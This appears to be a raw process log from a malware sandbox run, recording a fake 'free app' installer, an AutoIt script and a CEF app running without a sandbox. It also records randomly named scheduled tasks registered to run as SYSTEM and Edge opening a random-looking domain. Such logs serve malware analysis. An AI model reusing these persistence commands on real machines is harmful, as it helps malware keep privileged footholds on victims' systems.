schtasks /CREATE /TN "prMGXFkeeUTMdhmNg2" /F /xml "C:\Program Files (x86)\rDAvgYGuVEIABXmxEhR\hRZuhkU.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "dFoJmIVNgWiokFVCHjs2" /F /xml "C:\Program Files (x86)\PyvCjIxDuxQTC\ATNDxPr.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QLZZy1" /SC once /ST 00:36:18 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "QLZZy1"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe729ab58,0x7fffe729ab68,0x7fffe729ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2144 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3204 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3212 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3744 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4364 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4384 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3748 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3752 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4924 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5172 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QLZZy1"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iHAtfpaAUcCnRIDUD"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 6128 -ip 6128
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 8184 -ip 8184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8184 -s 1416
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 7444 -ip 7444
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7444 -s 2116
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "NGzbm1" /SC once /ST 00:27:26 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BxCbD1" /SC once /ST 00:59:53 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BxCbD1"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "NGzbm1"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffe729ab58,0x7fffe729ab68,0x7fffe729ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe729ab58,0x7fffe729ab68,0x7fffe729ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=2004,i,1852433603896658462,17023452261367090530,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1828 --field-trial-handle=2004,i,1852433603896658462,17023452261367090530,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4760 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4188 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=1992,i,323143101858692454,14401669241550121102,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1924 --field-trial-handle=1992,i,323143101858692454,14401669241550121102,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5808 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BxCbD1"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "NGzbm1"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iHAtfpaAUcCnRIDUD"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iHAtfpaAUcCnRIDUD"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 7528 -ip 7528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 6728 -ip 6728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 2156
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6728 -s 2180
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=5752 --field-trial-handle=2904,i,18074322322295882051,5199891644126132132,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1164
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2128
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1672
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5588 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=6088 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6096 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6452 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6532 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=4892 --field-trial-handle=2904,i,18074322322295882051,5199891644126132132,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\" -ad -an -ai#7zMap13695:152:7zEvent24052
C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe
"C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe"
C:\Windows\SysWOW64\more.com
C:\Windows\SysWOW64\more.com
C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe
"C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe"
C:\Windows\SysWOW64\more.com
C:\Windows\SysWOW64\more.com
C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe
"C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe"
C:\Windows\SysWOW64\more.com
C:\Windows\SysWOW64\more.com
C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe
"C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe"
C:\Windows\SysWOW64\more.com
C:\Windows\SysWOW64\more.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=1672 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=2640 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\Cwu.au3
C:\Users\Admin\AppData\Local\Temp\Cwu.au3
C:\Users\Admin\AppData\Local\Temp\Cwu.au3
C:\Users\Admin\AppData\Local\Temp\Cwu.au3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=1560 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5368 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://zamesoczxuswe.site/f60a9c36a8edc8f7995329dae4b6622a3jlzzQ1QwCEFDftBSa0NKN-urNUHKV1EJsA8uQg7r3rX
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x2c4,0x2c8,0x2cc,0x2c0,0x374,0x7fffe0d2ceb8,0x7fffe0d2cec4,0x7fffe0d2ced0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2720,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=2476 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1828,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=3108 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=3132 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3284,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=2900 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3292,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=3760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2128,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4720,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=3288 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\Cwu.au3
C:\Users\Admin\AppData\Local\Temp\Cwu.au3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4472,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=4824 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\Cwu.au3
C:\Users\Admin\AppData\Local\Temp\Cwu.au3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4788,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=4800 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=4772,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=5532 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5404,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=6096 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5404,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=6096 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5420,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=5384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --field-trial-handle=6836,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=6880 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=6584,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=6932 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5276,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=6944 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7164,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=7176 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\setup_6nBN3qWfKP\" -ad -an -ai#7zMap29667:94:7zEvent7937
C:\Users\Admin\Downloads\setup_6nBN3qWfKP\setup_6nBN3qWfKP.exe
"C:\Users\Admin\Downloads\setup_6nBN3qWfKP\setup_6nBN3qWfKP.exe"
C:\Users\Admin\AppData\Local\Temp\is-KSFSM.tmp\setup_6nBN3qWfKP.tmp
